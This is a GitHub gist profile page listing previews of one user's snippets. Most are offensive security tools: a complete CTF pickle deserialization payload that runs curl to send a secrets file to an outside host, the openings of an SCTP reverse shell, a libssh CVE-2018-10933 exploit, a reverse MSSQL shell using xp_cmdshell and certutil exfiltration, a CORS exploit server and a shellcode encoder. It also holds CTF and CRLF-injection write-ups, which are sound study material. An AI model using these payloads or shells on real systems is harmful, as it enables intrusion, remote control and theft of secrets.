Skip to content

Instantly share code, notes, and snippets.

View ricardojba's full-sized avatar

Ricardo ricardojba

54 followers · 8 following
View GitHub Profile
@ricardojba
ricardojba / jira-curl.sh
Created May 14, 2019 08:47 — forked from TheMightyLlama/jira-curl.sh
Perform actions on a jira issue via curl
#Creates a new issue with custom fields
curl -D- -u uname:pass -X POST --data "{\"fields\": {\"project\": { \"id\": \"10430\" },\"summary\": \"This is a test issue\", \"description\": \"Description\",\"issuetype\": { \"id\" : \"1\"}, \"components\" : [{\"id\":\"10731\"}], \"customfield_10711\" : [{\"id\":\"10500\"}] } }" -H "Content-Type: application/json" http://localhost:8080/jira/rest/api/2/issue/
#Returns all information for all versions
curl -D- -u uname:pass -X PUT -d "Content-Type: application/json" http://localhost:8080/jira/rest/api/2/project/AN/versions?
#Returns all issues in a version
#This URL requires the version ID of a single version which is provided by the above query
curl -D- -u uname:pass -X PUT -d "Content-Type: application/json" http://localhost:8080/jira/rest/api/2/search?jql=project="AN"+AND+fixVersion='12345'
@ricardojba
ricardojba / 0xOPOSEC 0x71 Challenge
Created February 8, 2019 15:15
cposix
system
p0
(S'curl -d "foo=`cat /secrets/secret.txt`" http://myhost:4444'
p1
tp2
Rp3
.
FLAG{N3v3r_Us3_P1cKl3_f0R_3xt3rN4L_0Bj3c75!}
@ricardojba
ricardojba / 0xOPOSEC 0x70 Challenge
Last active May 29, 2022 11:29
-- challenge 1:
From the name of the challenge it was a dead giveway that there was a .git folder exposed.
Then just find out where the git repo is hosted:
curl http://0x70.apl3b.com/.git/config
And get the repo hosting service:
https://gitlab.com/DDuarte/twipy.git
Finally check all the commits and on this one at the bottom of the page you can read a flag:
@ricardojba
ricardojba / sctp_reverse_shell.py
Created December 3, 2018 17:29 — forked from hyperreality/sctp_reverse_shell.py
Simple Python reverse shell using the SCTP protocol
#!/usr/bin/env python3
#
# Tiny SCTP Reverse Shell inspired by http://insecurety.net/?p=765
# Connect with `ncat --sctp -lvp 1234`
import os, socket, subprocess
RHOST = '127.0.0.1'
RPORT = 1234
@ricardojba
ricardojba / CVE-2018-10933-1.py
Last active October 19, 2018 14:53 — forked from mlosapio/CVE-2018-10933-test
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Based on https://www.openwall.com/lists/oss-security/2018/08/16/1
# and on https://www.libssh.org/security/advisories/CVE-2018-10933.txt
# Original exploit code https://gist.github.com/mlosapio/2062ebf943485a7289d226e0d00498e7
# References
# https://qxf2.com/blog/ssh-using-python-paramiko/
# https://github.com/SoledaD208/CVE-2018-10933
# On OSX -> pip install paramiko==2.0.8
@ricardojba
ricardojba / php-curl-crlf-injection.mkd
Created August 1, 2018 16:01 — forked from tomnomnom/php-curl-crlf-injection.mkd
CRLF Injection Into PHP's cURL Options

CRLF Injection Into PHP's cURL Options

I spent the weekend meeting hackers in Vegas, and I got talking to one of them about CRLF Injection. They'd not seen many CRLF Injection vulnerabilities in the wild, so I thought I'd write up an example that's similar to something I found a few months ago.

If you're looking for bugs legally through a program like hackerone, or you're a programmer wanting to write secure PHP: this might be useful to you.

@ricardojba
ricardojba / mandros.py
Created July 4, 2018 09:35 — forked from xassiz/mandros.py
Reverse MSSQL shell
import sys
import requests
import threading
import HTMLParser
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
'''
Description: Reverse MSSQL shell through xp_cmdshell + certutil for exfiltration
Author: @xassiz
'''
@ricardojba
ricardojba / cors_exploit_server.py
Created June 29, 2018 11:24
Python Simple HTTP Server for testing or exploiting CORS
#!/usr/bin/env python
from sys import argv
import BaseHTTPServer
import ssl
class CORSHTTPRequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):
def do_OPTIONS(self):
self.send_response(200, "ok")
#self.send_header('Access-Control-Allow-Origin', '*')
@ricardojba
ricardojba / windows_hardening.cmd
Last active May 4, 2024 21:26
A Windows hardening script
::##########################################################################################################################
::
:: This script can ruin your day, if you run it without fully understanding what it does, you don't know what you are doing,
::
:: OR BOTH!!!
::
:: YOU HAVE BEEN WARNED!!!!!!!!!!
::
:: This script is provided "AS IS" with no warranties, and confers no rights.
:: Feel free to challenge me, disagree with me, or tell me I'm completely nuts in the comments section,
@ricardojba
ricardojba / ascii-shellcode-encoder.py
Created November 20, 2017 17:26 — forked from mgeeky/ascii-shellcode-encoder.py
ASCII Shellcode encoder for Exploit Development purposes, utilizing Jon Erickson's substract arguments finding algorithm.
#!/usr/bin/python
#
# Shellcode to ASCII encoder leveraging rebuilding on-the-stack technique,
# and using Jon Erickson's algorithm from Phiral Research Labs `Dissembler`
# utility (as described in: Hacking - The Art of Exploitation).
#
# Basically one gives to the program's output a binary encoded shellcode,
# and it yields on the output it's ASCII encoded form.
#
# This payload will at the beginning align the stack by firstly moving